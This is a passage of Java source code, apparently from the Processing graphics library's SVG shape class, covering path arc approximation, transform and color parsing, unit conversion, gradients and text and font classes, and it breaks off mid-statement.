break;\n\n // A - elliptical arc to (absolute)\n case 'A': {\n float rx = PApplet.parseFloat(pathTokens[i + 1]);\n float ry = PApplet.parseFloat(pathTokens[i + 2]);\n float angle = PApplet.parseFloat(pathTokens[i + 3]);\n boolean fa = PApplet.parseFloat(pathTokens[i + 4]) != 0;\n boolean fs = PApplet.parseFloat(pathTokens[i + 5]) != 0;\n float endX = PApplet.parseFloat(pathTokens[i + 6]);\n float endY = PApplet.parseFloat(pathTokens[i + 7]);\n parsePathArcto(cx, cy, rx, ry, angle, fa, fs, endX, endY);\n cx = endX;\n cy = endY;\n i += 8;\n prevCurve = true;\n }\n break;\n\n // a - elliptical arc to (relative)\n case 'a': {\n float rx = PApplet.parseFloat(pathTokens[i + 1]);\n float ry = PApplet.parseFloat(pathTokens[i + 2]);\n float angle = PApplet.parseFloat(pathTokens[i + 3]);\n boolean fa = PApplet.parseFloat(pathTokens[i + 4]) != 0;\n boolean fs = PApplet.parseFloat(pathTokens[i + 5]) != 0;\n float endX = cx + PApplet.parseFloat(pathTokens[i + 6]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 7]);\n parsePathArcto(cx, cy, rx, ry, angle, fa, fs, endX, endY);\n cx = endX;\n cy = endY;\n i += 8;\n prevCurve = true;\n }\n break;\n\n case 'Z':\n case 'z':\n // since closing the path, the 'current' point needs\n // to return back to the last moveto location.\n // http://code.google.com/p/processing/issues/detail?id=1058\n cx = movetoX;\n cy = movetoY;\n close = true;\n i++;\n break;\n\n default:\n String parsed =\n PApplet.join(PApplet.subset(pathTokens, 0, i), \",\");\n String unparsed =\n PApplet.join(PApplet.subset(pathTokens, i), \",\");\n System.err.println(\"parsed: \" + parsed);\n System.err.println(\"unparsed: \" + unparsed);\n throw new RuntimeException(\"shape command not handled: \" + pathTokens[i]);\n }\n// prevCommand = c;\n }\n }\n\n\n// private void parsePathCheck(int num) {\n// if (vertexCount + num-1 >= vertices.length) {\n// //vertices = (float[][]) PApplet.expand(vertices);\n// float[][] temp = new float[vertexCount << 1][2];\n// System.arraycopy(vertices, 0, temp, 0, vertexCount);\n// vertices = temp;\n// }\n// }\n\n private void parsePathVertex(float x, float y) {\n if (vertexCount == vertices.length) {\n //vertices = (float[][]) PApplet.expand(vertices);\n float[][] temp = new float[vertexCount << 1][2];\n System.arraycopy(vertices, 0, temp, 0, vertexCount);\n vertices = temp;\n }\n vertices[vertexCount][X] = x;\n vertices[vertexCount][Y] = y;\n vertexCount++;\n }\n\n\n private void parsePathCode(int what) {\n if (vertexCodeCount == vertexCodes.length) {\n vertexCodes = PApplet.expand(vertexCodes);\n }\n vertexCodes[vertexCodeCount++] = what;\n }\n\n\n private void parsePathMoveto(float px, float py) {\n if (vertexCount > 0) {\n parsePathCode(BREAK);\n }\n parsePathCode(VERTEX);\n parsePathVertex(px, py);\n }\n\n\n private void parsePathLineto(float px, float py) {\n parsePathCode(VERTEX);\n parsePathVertex(px, py);\n }\n\n\n private void parsePathCurveto(float x1, float y1,\n float x2, float y2,\n float x3, float y3) {\n parsePathCode(BEZIER_VERTEX);\n parsePathVertex(x1, y1);\n parsePathVertex(x2, y2);\n parsePathVertex(x3, y3);\n }\n\n// private void parsePathQuadto(float x1, float y1,\n// float cx, float cy,\n// float x2, float y2) {\n// //System.out.println(\"quadto: \" + x1 + \",\" + y1 + \" \" + cx + \",\" + cy + \" \" + x2 + \",\" + y2);\n//// parsePathCode(BEZIER_VERTEX);\n// parsePathCode(QUAD_BEZIER_VERTEX);\n// // x1/y1 already covered by last moveto, lineto, or curveto\n//\n// parsePathVertex(x1 + ((cx-x1)*2/3.0f), y1 + ((cy-y1)*2/3.0f));\n// parsePathVertex(x2 + ((cx-x2)*2/3.0f), y2 + ((cy-y2)*2/3.0f));\n// parsePathVertex(x2, y2);\n// }\n\n private void parsePathQuadto(float cx, float cy,\n float x2, float y2) {\n //System.out.println(\"quadto: \" + x1 + \",\" + y1 + \" \" + cx + \",\" + cy + \" \" + x2 + \",\" + y2);\n// parsePathCode(BEZIER_VERTEX);\n parsePathCode(QUADRATIC_VERTEX);\n // x1/y1 already covered by last moveto, lineto, or curveto\n parsePathVertex(cx, cy);\n parsePathVertex(x2, y2);\n }\n\n\n // Approximates elliptical arc by several bezier segments.\n // Meets SVG standard requirements from:\n // http://www.w3.org/TR/SVG/paths.html#PathDataEllipticalArcCommands\n // http://www.w3.org/TR/SVG/implnote.html#ArcImplementationNotes\n // Based on arc to bezier curve equations from:\n // http://www.spaceroots.org/documents/ellipse/node22.html\n private void parsePathArcto(float x1, float y1,\n float rx, float ry,\n float angle,\n boolean fa, boolean fs,\n float x2, float y2) {\n if (x1 == x2 && y1 == y2) return;\n if (rx == 0 || ry == 0) { parsePathLineto(x2, y2); return; }\n\n rx = PApplet.abs(rx); ry = PApplet.abs(ry);\n\n float phi = PApplet.radians(((angle % 360) + 360) % 360);\n float cosPhi = PApplet.cos(phi), sinPhi = PApplet.sin(phi);\n\n float x1r = ( cosPhi * (x1 - x2) + sinPhi * (y1 - y2)) / 2;\n float y1r = (-sinPhi * (x1 - x2) + cosPhi * (y1 - y2)) / 2;\n\n float cxr, cyr;\n {\n float A = (x1r*x1r) / (rx*rx) + (y1r*y1r) / (ry*ry);\n if (A > 1) {\n // No solution, scale ellipse up according to SVG standard\n float sqrtA = PApplet.sqrt(A);\n rx *= sqrtA; cxr = 0;\n ry *= sqrtA; cyr = 0;\n } else {\n float k = ((fa == fs) ? -1f : 1f) *\n PApplet.sqrt((rx*rx * ry*ry) / ((rx*rx * y1r*y1r) + (ry*ry * x1r*x1r)) - 1f);\n cxr = k * rx * y1r / ry;\n cyr = -k * ry * x1r / rx;\n }\n }\n\n float cx = cosPhi * cxr - sinPhi * cyr + (x1 + x2) / 2;\n float cy = sinPhi * cxr + cosPhi * cyr + (y1 + y2) / 2;\n\n float phi1, phiDelta;\n {\n float sx = ( x1r - cxr) / rx, sy = ( y1r - cyr) / ry;\n float tx = (-x1r - cxr) / rx, ty = (-y1r - cyr) / ry;\n phi1 = PApplet.atan2(sy, sx);\n phiDelta = (((PApplet.atan2(ty, tx) - phi1) % TWO_PI) + TWO_PI) % TWO_PI;\n if (!fs) phiDelta -= TWO_PI;\n }\n\n // One segment can not cover more that PI, less than PI/2 is\n // recommended to avoid visible inaccuracies caused by rounding errors\n int segmentCount = PApplet.ceil(PApplet.abs(phiDelta) / TWO_PI * 4);\n\n float inc = phiDelta / segmentCount;\n float a = PApplet.sin(inc) *\n (PApplet.sqrt(4 + 3 * PApplet.sq(PApplet.tan(inc / 2))) - 1) / 3;\n\n float sinPhi1 = PApplet.sin(phi1), cosPhi1 = PApplet.cos(phi1);\n\n float p1x = x1;\n float p1y = y1;\n float relq1x = a * (-rx * cosPhi * sinPhi1 - ry * sinPhi * cosPhi1);\n float relq1y = a * (-rx * sinPhi * sinPhi1 + ry * cosPhi * cosPhi1);\n\n for (int i = 0; i < segmentCount; i++) {\n float eta = phi1 + (i + 1) * inc;\n float sinEta = PApplet.sin(eta), cosEta = PApplet.cos(eta);\n\n float p2x = cx + rx * cosPhi * cosEta - ry * sinPhi * sinEta;\n float p2y = cy + rx * sinPhi * cosEta + ry * cosPhi * sinEta;\n float relq2x = a * (-rx * cosPhi * sinEta - ry * sinPhi * cosEta);\n float relq2y = a * (-rx * sinPhi * sinEta + ry * cosPhi * cosEta);\n\n if (i == segmentCount - 1) { p2x = x2; p2y = y2; }\n\n parsePathCode(BEZIER_VERTEX);\n parsePathVertex(p1x + relq1x, p1y + relq1y);\n parsePathVertex(p2x - relq2x, p2y - relq2y);\n parsePathVertex(p2x, p2y);\n\n p1x = p2x; relq1x = relq2x;\n p1y = p2y; relq1y = relq2y;\n }\n }\n\n\n /**\n * Parse the specified SVG matrix into a PMatrix2D. Note that PMatrix2D\n * is rotated relative to the SVG definition, so parameters are rearranged\n * here. More about the transformation matrices in\n * this section\n * of the SVG documentation.\n * @param matrixStr text of the matrix param.\n * @return a good old-fashioned PMatrix2D\n */\n static protected PMatrix2D parseTransform(String matrixStr) {\n matrixStr = matrixStr.trim();\n PMatrix2D outgoing = null;\n int start = 0;\n int stop = -1;\n while ((stop = matrixStr.indexOf(')', start)) != -1) {\n PMatrix2D m = parseSingleTransform(matrixStr.substring(start, stop+1));\n if (outgoing == null) {\n outgoing = m;\n } else {\n outgoing.apply(m);\n }\n start = stop + 1;\n }\n return outgoing;\n }\n\n\n static protected PMatrix2D parseSingleTransform(String matrixStr) {\n //String[] pieces = PApplet.match(matrixStr, \"^\\\\s*(\\\\w+)\\\\((.*)\\\\)\\\\s*$\");\n String[] pieces = PApplet.match(matrixStr, \"[,\\\\s]*(\\\\w+)\\\\((.*)\\\\)\");\n if (pieces == null) {\n System.err.println(\"Could not parse transform \" + matrixStr);\n return null;\n }\n float[] m = PApplet.parseFloat(PApplet.splitTokens(pieces[2], \", \"));\n if (pieces[1].equals(\"matrix\")) {\n return new PMatrix2D(m[0], m[2], m[4], m[1], m[3], m[5]);\n\n } else if (pieces[1].equals(\"translate\")) {\n float tx = m[0];\n float ty = (m.length == 2) ? m[1] : m[0];\n return new PMatrix2D(1, 0, tx, 0, 1, ty);\n\n } else if (pieces[1].equals(\"scale\")) {\n float sx = m[0];\n float sy = (m.length == 2) ? m[1] : m[0];\n return new PMatrix2D(sx, 0, 0, 0, sy, 0);\n\n } else if (pieces[1].equals(\"rotate\")) {\n float angle = m[0];\n\n if (m.length == 1) {\n float c = PApplet.cos(angle);\n float s = PApplet.sin(angle);\n // SVG version is cos(a) sin(a) -sin(a) cos(a) 0 0\n return new PMatrix2D(c, -s, 0, s, c, 0);\n\n } else if (m.length == 3) {\n PMatrix2D mat = new PMatrix2D(0, 1, m[1], 1, 0, m[2]);\n mat.rotate(m[0]);\n mat.translate(-m[1], -m[2]);\n return mat;\n }\n\n } else if (pieces[1].equals(\"skewX\")) {\n return new PMatrix2D(1, 0, 1, PApplet.tan(m[0]), 0, 0);\n\n } else if (pieces[1].equals(\"skewY\")) {\n return new PMatrix2D(1, 0, 1, 0, PApplet.tan(m[0]), 0);\n }\n return null;\n }\n\n\n protected void parseColors(XML properties) {\n if (properties.hasAttribute(\"opacity\")) {\n String opacityText = properties.getString(\"opacity\");\n setOpacity(opacityText);\n }\n\n if (properties.hasAttribute(\"stroke\")) {\n String strokeText = properties.getString(\"stroke\");\n setColor(strokeText, false);\n }\n\n if (properties.hasAttribute(\"stroke-opacity\")) {\n String strokeOpacityText = properties.getString(\"stroke-opacity\");\n setStrokeOpacity(strokeOpacityText);\n }\n\n if (properties.hasAttribute(\"stroke-width\")) {\n // if NaN (i.e. if it's 'inherit') then default back to the inherit setting\n String lineweight = properties.getString(\"stroke-width\");\n setStrokeWeight(lineweight);\n }\n\n if (properties.hasAttribute(\"stroke-linejoin\")) {\n String linejoin = properties.getString(\"stroke-linejoin\");\n setStrokeJoin(linejoin);\n }\n\n if (properties.hasAttribute(\"stroke-linecap\")) {\n String linecap = properties.getString(\"stroke-linecap\");\n setStrokeCap(linecap);\n }\n\n // fill defaults to black (though stroke defaults to \"none\")\n // http://www.w3.org/TR/SVG/painting.html#FillProperties\n if (properties.hasAttribute(\"fill\")) {\n String fillText = properties.getString(\"fill\");\n setColor(fillText, true);\n }\n\n if (properties.hasAttribute(\"fill-opacity\")) {\n String fillOpacityText = properties.getString(\"fill-opacity\");\n setFillOpacity(fillOpacityText);\n }\n\n if (properties.hasAttribute(\"style\")) {\n String styleText = properties.getString(\"style\");\n String[] styleTokens = PApplet.splitTokens(styleText, \";\");\n\n //PApplet.println(styleTokens);\n for (int i = 0; i < styleTokens.length; i++) {\n String[] tokens = PApplet.splitTokens(styleTokens[i], \":\");\n //PApplet.println(tokens);\n\n tokens[0] = PApplet.trim(tokens[0]);\n\n if (tokens[0].equals(\"fill\")) {\n setColor(tokens[1], true);\n\n } else if(tokens[0].equals(\"fill-opacity\")) {\n setFillOpacity(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke\")) {\n setColor(tokens[1], false);\n\n } else if(tokens[0].equals(\"stroke-width\")) {\n setStrokeWeight(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke-linecap\")) {\n setStrokeCap(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke-linejoin\")) {\n setStrokeJoin(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke-opacity\")) {\n setStrokeOpacity(tokens[1]);\n\n } else if(tokens[0].equals(\"opacity\")) {\n setOpacity(tokens[1]);\n\n } else {\n // Other attributes are not yet implemented\n }\n }\n }\n }\n\n\n void setOpacity(String opacityText) {\n opacity = PApplet.parseFloat(opacityText);\n strokeColor = ((int) (opacity * 255)) << 24 | strokeColor & 0xFFFFFF;\n fillColor = ((int) (opacity * 255)) << 24 | fillColor & 0xFFFFFF;\n }\n\n\n void setStrokeWeight(String lineweight) {\n strokeWeight = parseUnitSize(lineweight, svgSizeXY);\n }\n\n\n void setStrokeOpacity(String opacityText) {\n strokeOpacity = PApplet.parseFloat(opacityText);\n strokeColor = ((int) (strokeOpacity * 255)) << 24 | strokeColor & 0xFFFFFF;\n }\n\n\n void setStrokeJoin(String linejoin) {\n if (linejoin.equals(\"inherit\")) {\n // do nothing, will inherit automatically\n\n } else if (linejoin.equals(\"miter\")) {\n strokeJoin = PConstants.MITER;\n\n } else if (linejoin.equals(\"round\")) {\n strokeJoin = PConstants.ROUND;\n\n } else if (linejoin.equals(\"bevel\")) {\n strokeJoin = PConstants.BEVEL;\n }\n }\n\n\n void setStrokeCap(String linecap) {\n if (linecap.equals(\"inherit\")) {\n // do nothing, will inherit automatically\n\n } else if (linecap.equals(\"butt\")) {\n strokeCap = PConstants.SQUARE;\n\n } else if (linecap.equals(\"round\")) {\n strokeCap = PConstants.ROUND;\n\n } else if (linecap.equals(\"square\")) {\n strokeCap = PConstants.PROJECT;\n }\n }\n\n\n void setFillOpacity(String opacityText) {\n fillOpacity = PApplet.parseFloat(opacityText);\n fillColor = ((int) (fillOpacity * 255)) << 24 | fillColor & 0xFFFFFF;\n }\n\n\n void setColor(String colorText, boolean isFill) {\n colorText = colorText.trim();\n int opacityMask = fillColor & 0xFF000000;\n boolean visible = true;\n int color = 0;\n String name = \"\";\n// String lColorText = colorText.toLowerCase();\n Gradient gradient = null;\n// Object paint = null;\n if (colorText.equals(\"none\")) {\n visible = false;\n } else if (colorText.startsWith(\"url(#\")) {\n name = colorText.substring(5, colorText.length() - 1);\n Object object = findChild(name);\n if (object instanceof Gradient) {\n gradient = (Gradient) object;\n // in 3.0a11, do this on first draw inside PShapeJava2D\n// paint = calcGradientPaint(gradient); //, opacity);\n } else {\n// visible = false;\n System.err.println(\"url \" + name + \" refers to unexpected data: \" + object);\n }\n } else {\n // Prints errors itself.\n color = opacityMask | parseSimpleColor(colorText);\n }\n if (isFill) {\n fill = visible;\n fillColor = color;\n fillName = name;\n fillGradient = gradient;\n// fillGradientPaint = paint;\n } else {\n stroke = visible;\n strokeColor = color;\n strokeName = name;\n strokeGradient = gradient;\n// strokeGradientPaint = paint;\n }\n }\n\n\n /**\n * Parses the \"color\" datatype only, and prints an error if it is not of this form.\n * http://www.w3.org/TR/SVG/types.html#DataTypeColor\n * @return 0xRRGGBB (no alpha). Zero on error.\n */\n static protected int parseSimpleColor(String colorText) {\n colorText = colorText.toLowerCase().trim();\n //if (colorNames.containsKey(colorText)) {\n if (colorNames.hasKey(colorText)) {\n return colorNames.get(colorText);\n } else if (colorText.startsWith(\"#\")) {\n if (colorText.length() == 4) {\n // Short form: #ABC, transform to long form #AABBCC\n colorText = colorText.replaceAll(\"^#(.)(.)(.)$\", \"#$1$1$2$2$3$3\");\n }\n return (Integer.parseInt(colorText.substring(1), 16)) & 0xFFFFFF;\n //System.out.println(\"hex for fill is \" + PApplet.hex(fillColor));\n } else if (colorText.startsWith(\"rgb\")) {\n return parseRGB(colorText);\n } else {\n System.err.println(\"Cannot parse \\\"\" + colorText + \"\\\".\");\n return 0;\n }\n }\n\n\n /**\n * Deliberately conforms to the HTML 4.01 color spec + en-gb grey, rather\n * than the (unlikely to be useful) entire 147-color system used in SVG.\n */\n static protected IntDict colorNames = new IntDict(new Object[][] {\n { \"aqua\", 0x00ffff },\n { \"black\", 0x000000 },\n { \"blue\", 0x0000ff },\n { \"fuchsia\", 0xff00ff },\n { \"gray\", 0x808080 },\n { \"grey\", 0x808080 },\n { \"green\", 0x008000 },\n { \"lime\", 0x00ff00 },\n { \"maroon\", 0x800000 },\n { \"navy\", 0x000080 },\n { \"olive\", 0x808000 },\n { \"purple\", 0x800080 },\n { \"red\", 0xff0000 },\n { \"silver\", 0xc0c0c0 },\n { \"teal\", 0x008080 },\n { \"white\", 0xffffff },\n { \"yellow\", 0xffff00 }\n });\n\n /*\n static protected Map colorNames;\n static {\n colorNames = new HashMap();\n colorNames.put(\"aqua\", 0x00ffff);\n colorNames.put(\"black\", 0x000000);\n colorNames.put(\"blue\", 0x0000ff);\n colorNames.put(\"fuchsia\", 0xff00ff);\n colorNames.put(\"gray\", 0x808080);\n colorNames.put(\"grey\", 0x808080);\n colorNames.put(\"green\", 0x008000);\n colorNames.put(\"lime\", 0x00ff00);\n colorNames.put(\"maroon\", 0x800000);\n colorNames.put(\"navy\", 0x000080);\n colorNames.put(\"olive\", 0x808000);\n colorNames.put(\"purple\", 0x800080);\n colorNames.put(\"red\", 0xff0000);\n colorNames.put(\"silver\", 0xc0c0c0);\n colorNames.put(\"teal\", 0x008080);\n colorNames.put(\"white\", 0xffffff);\n colorNames.put(\"yellow\", 0xffff00);\n }\n */\n\n static protected int parseRGB(String what) {\n int leftParen = what.indexOf('(') + 1;\n int rightParen = what.indexOf(')');\n String sub = what.substring(leftParen, rightParen);\n String[] values = PApplet.splitTokens(sub, \", \");\n int rgbValue = 0;\n if (values.length == 3) {\n // Color spec allows for rgb values to be percentages.\n for (int i = 0; i < 3; i++) {\n rgbValue <<= 8;\n if (values[i].endsWith(\"%\")) {\n rgbValue |= (int)(PApplet.constrain(255*parseFloatOrPercent(values[i]), 0, 255));\n } else {\n rgbValue |= PApplet.constrain(PApplet.parseInt(values[i]), 0, 255);\n }\n }\n } else System.err.println(\"Could not read color \\\"\" + what + \"\\\".\");\n\n return rgbValue;\n }\n\n\n //static protected Map parseStyleAttributes(String style) {\n static protected StringDict parseStyleAttributes(String style) {\n //Map table = new HashMap();\n StringDict table = new StringDict();\n// if (style == null) return table;\n if (style != null) {\n String[] pieces = style.split(\";\");\n for (int i = 0; i < pieces.length; i++) {\n String[] parts = pieces[i].split(\":\");\n //table.put(parts[0], parts[1]);\n table.set(parts[0], parts[1]);\n }\n }\n return table;\n }\n\n\n /**\n * Used in place of element.getFloatAttribute(a) because we can\n * have a unit suffix (length or coordinate).\n * @param element what to parse\n * @param attribute name of the attribute to get\n * @param relativeTo (float) Used for %. When relative to viewbox, should\n * be svgWidth for horizontal dimentions, svgHeight for vertical, and\n * svgXYSize for anything else.\n * @return unit-parsed version of the data\n */\n static protected float getFloatWithUnit(XML element, String attribute, float relativeTo) {\n String val = element.getString(attribute);\n return (val == null) ? 0 : parseUnitSize(val, relativeTo);\n }\n\n\n /**\n * Parse a size that may have a suffix for its units.\n * This assumes 90dpi, which implies, as given in the\n * units spec:\n *
    \n *
  • \"1pt\" equals \"1.25px\" (and therefore 1.25 user units)\n *
  • \"1pc\" equals \"15px\" (and therefore 15 user units)\n *
  • \"1mm\" would be \"3.543307px\" (3.543307 user units)\n *
  • \"1cm\" equals \"35.43307px\" (and therefore 35.43307 user units)\n *
  • \"1in\" equals \"90px\" (and therefore 90 user units)\n *
\n * @param relativeTo (float) Used for %. When relative to viewbox, should\n * be svgWidth for horizontal dimentions, svgHeight for vertical, and\n * svgXYSize for anything else.\n */\n static protected float parseUnitSize(String text, float relativeTo) {\n int len = text.length() - 2;\n\n if (text.endsWith(\"pt\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 1.25f;\n } else if (text.endsWith(\"pc\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 15;\n } else if (text.endsWith(\"mm\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 3.543307f;\n } else if (text.endsWith(\"cm\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 35.43307f;\n } else if (text.endsWith(\"in\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 90;\n } else if (text.endsWith(\"px\")) {\n return PApplet.parseFloat(text.substring(0, len));\n } else if (text.endsWith(\"%\")) {\n return relativeTo * parseFloatOrPercent(text);\n } else {\n return PApplet.parseFloat(text);\n }\n }\n\n\n static protected float parseFloatOrPercent(String text) {\n text = text.trim();\n if (text.endsWith(\"%\")) {\n return Float.parseFloat(text.substring(0, text.length() - 1)) / 100.0f;\n } else {\n return Float.parseFloat(text);\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class Gradient extends PShapeSVG {\n Matrix transform;\n\n public float[] offset;\n public int[] color;\n public int count;\n\n public Gradient(PShapeSVG parent, XML properties) {\n super(parent, properties, true);\n\n XML elements[] = properties.getChildren();\n offset = new float[elements.length];\n color = new int[elements.length];\n\n // \n for (int i = 0; i < elements.length; i++) {\n XML elem = elements[i];\n String name = elem.getName();\n if (name.equals(\"stop\")) {\n String offsetAttr = elem.getString(\"offset\");\n offset[count] = parseFloatOrPercent(offsetAttr);\n\n String style = elem.getString(\"style\");\n //Map styles = parseStyleAttributes(style);\n StringDict styles = parseStyleAttributes(style);\n\n String colorStr = styles.get(\"stop-color\");\n if (colorStr == null) {\n colorStr = elem.getString(\"stop-color\");\n if (colorStr == null) colorStr = \"#000000\";\n }\n String opacityStr = styles.get(\"stop-opacity\");\n if (opacityStr == null) {\n opacityStr = elem.getString(\"stop-opacity\");\n if (opacityStr == null) opacityStr = \"1\";\n }\n int tupacity = PApplet.constrain(\n (int)(PApplet.parseFloat(opacityStr) * 255), 0, 255);\n color[count] = (tupacity << 24) | parseSimpleColor(colorStr);\n count++;\n }\n }\n offset = PApplet.subset(offset, 0, count);\n color = PApplet.subset(color, 0, count);\n }\n }\n\n\n public class LinearGradient extends Gradient {\n public float x1, y1, x2, y2;\n\n public LinearGradient(PShapeSVG parent, XML properties) {\n super(parent, properties);\n\n this.x1 = getFloatWithUnit(properties, \"x1\", svgWidth);\n this.y1 = getFloatWithUnit(properties, \"y1\", svgHeight);\n this.x2 = getFloatWithUnit(properties, \"x2\", svgWidth);\n this.y2 = getFloatWithUnit(properties, \"y2\", svgHeight);\n\n String transformStr =\n properties.getString(\"gradientTransform\");\n\n if (transformStr != null) {\n float t[] = parseTransform(transformStr).get(null);\n //this.transform = new AffineTransform(t[0], t[3], t[1], t[4], t[2], t[5]);\n transform = new Matrix();\n transform.setValues(new float[] { // TODO don't create temp floats\n t[0], t[1], t[2],\n t[3], t[4], t[5],\n 0, 0, 1\n });\n\n// Point2D t1 = transform.transform(new Point2D.Float(x1, y1), null);\n// Point2D t2 = transform.transform(new Point2D.Float(x2, y2), null);\n float[] t1 = new float[] { x1, y1 };\n float[] t2 = new float[] { x2, y2 };\n transform.mapPoints(t1);\n transform.mapPoints(t2);\n\n// this.x1 = (float) t1.getX();\n// this.y1 = (float) t1.getY();\n// this.x2 = (float) t2.getX();\n// this.y2 = (float) t2.getY();\n x1 = t1[0];\n y1 = t1[1];\n x2 = t2[0];\n y2 = t2[1];\n }\n }\n }\n\n\n public class RadialGradient extends Gradient {\n public float cx, cy, r;\n\n public RadialGradient(PShapeSVG parent, XML properties) {\n super(parent, properties);\n\n this.cx = getFloatWithUnit(properties, \"cx\", svgWidth);\n this.cy = getFloatWithUnit(properties, \"cy\", svgHeight);\n this.r = getFloatWithUnit(properties, \"r\", svgSizeXY);\n\n String transformStr =\n properties.getString(\"gradientTransform\");\n\n if (transformStr != null) {\n float t[] = parseTransform(transformStr).get(null);\n// this.transform = new AffineTransform(t[0], t[3], t[1], t[4], t[2], t[5]);\n transform = new Matrix();\n transform.setValues(new float[] { // TODO don't create temp floats\n t[0], t[1], t[2],\n t[3], t[4], t[5],\n 0, 0, 1\n });\n\n// Point2D t1 = transform.transform(new Point2D.Float(cx, cy), null);\n// Point2D t2 = transform.transform(new Point2D.Float(cx + r, cy), null);\n float[] t1 = new float[] { cx, cy };\n float[] t2 = new float[] { cx + r, cy };\n transform.mapPoints(t1);\n transform.mapPoints(t2);\n\n// this.cx = (float) t1.getX();\n// this.cy = (float) t1.getY();\n// this.r = (float) (t2.getX() - t1.getX());\n cx = t1[0];\n cy = t1[1];\n r = t2[0] - t1[0];\n }\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n// static private float TEXT_QUALITY = 1;\n public static final int PLAIN = 0;\n public static final int BOLD = 1;\n public static final int ITALIC = 2;\n\n static private PFont parseFont(XML properties) {\n String fontFamily = null;\n float size = 10;\n int weight = PLAIN; // 0\n int italic = 0;\n\n if (properties.hasAttribute(\"style\")) {\n String styleText = properties.getString(\"style\");\n String[] styleTokens = PApplet.splitTokens(styleText, \";\");\n\n //PApplet.println(styleTokens);\n for (int i = 0; i < styleTokens.length; i++) {\n String[] tokens = PApplet.splitTokens(styleTokens[i], \":\");\n //PApplet.println(tokens);\n\n tokens[0] = PApplet.trim(tokens[0]);\n\n if (tokens[0].equals(\"font-style\")) {\n // PApplet.println(\"font-style: \" + tokens[1]);\n if (tokens[1].contains(\"italic\")) {\n italic = ITALIC;\n }\n } else if (tokens[0].equals(\"font-variant\")) {\n // PApplet.println(\"font-variant: \" + tokens[1]);\n // setFillOpacity(tokens[1]);\n\n } else if (tokens[0].equals(\"font-weight\")) {\n // PApplet.println(\"font-weight: \" + tokens[1]);\n\n if (tokens[1].contains(\"bold\")) {\n weight = BOLD;\n // PApplet.println(\"Bold weight ! \");\n }\n\n\n } else if (tokens[0].equals(\"font-stretch\")) {\n // not supported.\n\n } else if (tokens[0].equals(\"font-size\")) {\n // PApplet.println(\"font-size: \" + tokens[1]);\n size = Float.parseFloat(tokens[1].split(\"px\")[0]);\n // PApplet.println(\"font-size-parsed: \" + size);\n } else if (tokens[0].equals(\"line-height\")) {\n // not supported\n\n } else if (tokens[0].equals(\"font-family\")) {\n // PApplet.println(\"Font-family: \" + tokens[1]);\n fontFamily = tokens[1];\n\n } else if (tokens[0].equals(\"text-align\")) {\n // not supported\n\n } else if (tokens[0].equals(\"letter-spacing\")) {\n // not supported\n\n } else if (tokens[0].equals(\"word-spacing\")) {\n // not supported\n\n } else if (tokens[0].equals(\"writing-mode\")) {\n // not supported\n\n } else if (tokens[0].equals(\"text-anchor\")) {\n // not supported\n\n } else {\n // Other attributes are not yet implemented\n }\n }\n }\n if (fontFamily == null) {\n return null;\n }\n// size = size * TEXT_QUALITY;\n\n return createFont(fontFamily, weight | italic, size, true);\n }\n\n\n static protected PFont createFont(String name, int weight,\n float size, boolean smooth) {\n //System.out.println(\"Try to create a font of \" + name + \" family, \" + weight);\n// java.awt.Font baseFont = new java.awt.Font(name, weight, (int) size);\n\n //System.out.println(\"Resulting family : \" + baseFont.getFamily() + \" \" + baseFont.getStyle());\n// return new PFont(baseFont.deriveFont(size), smooth, null);\n return null;\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class Text extends PShapeSVG {\n protected PFont font;\n\n public Text(PShapeSVG parent, XML properties) {\n super(parent, properties, true);\n\n // get location\n float x = Float.parseFloat(properties.getString(\"x\"));\n float y = Float.parseFloat(properties.getString(\"y\"));\n\n if (matrix == null) {\n matrix = new PMatrix2D();\n }\n matrix.translate(x, y);\n\n family = GROUP;\n\n font = parseFont(properties);\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class LineOfText extends PShapeSVG {\n String textToDisplay;\n PFont font;\n\n public LineOfText(PShapeSVG parent, XML properties) {\n // TODO: child should ideally be parsed too for inline content.\n super(parent, properties, false);\n\n //get location\n float x = Float.parseFloat(properties.getString(\"x\"));\n float y = Float.parseFloat(properties.getString(\"y\"));\n\n float parentX = Float.parseFloat(parent.element.getString(\"x\"));\n float parentY = Float.parseFloat(parent.element.getString(\"y\"));\n\n if (matrix == null) matrix = new PMatrix2D();\n matrix.translate(x - parentX, (y - parentY) / 2f);\n\n // get the first properties\n parseColors(properties);\n font = parseFont(properties);\n\n // cleaned up syntax but removing b/c unused [fry 190118]\n //boolean isLine = properties.getString(\"role\").equals(\"line\");\n\n if (this.childCount > 0) {\n // no inline content yet.\n }\n\n String text = properties.getContent();\n textToDisplay = text;\n }\n\n @Override\n public void drawImpl(PGraphics g) {\n if (font == null) {\n font = ((Text) parent).font;\n if (font == null) {\n return;\n }\n }\n\n pre(g);\n// g.textFont(font, font.size / TEXT_QUALITY);\n g.textFont(font, font.size);\n g.text(textToDisplay, 0, 0);\n post(g);\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class Font extends PShapeSVG {\n public FontFace face;\n\n public Map namedGlyphs;\n public Map unicodeGlyphs;\n\n public int glyphCount;\n public FontGlyph[] glyphs;\n public FontGlyph missingGlyph;\n\n int horizAdvX;\n\n\n public Font(PShapeSVG parent, XML properties) {\n super(parent, properties, false);\n// handle(parent, properties);\n\n XML[] elements = properties.getChildren();\n\n horizAdvX = properties.getInt(\"horiz-adv-x\", 0);\n\n namedGlyphs = new HashMap<>();\n unicodeGlyphs = new HashMap<>();\n glyphCount = 0;\n glyphs = new FontGlyph[elements.length];\n\n for (int i = 0; i < elements.length; i++) {\n String name = elements[i].getName();\n XML elem = elements[i];\n if (name == null) {\n // skip it\n } else if (name.equals(\"glyph\")) {\n FontGlyph fg = new 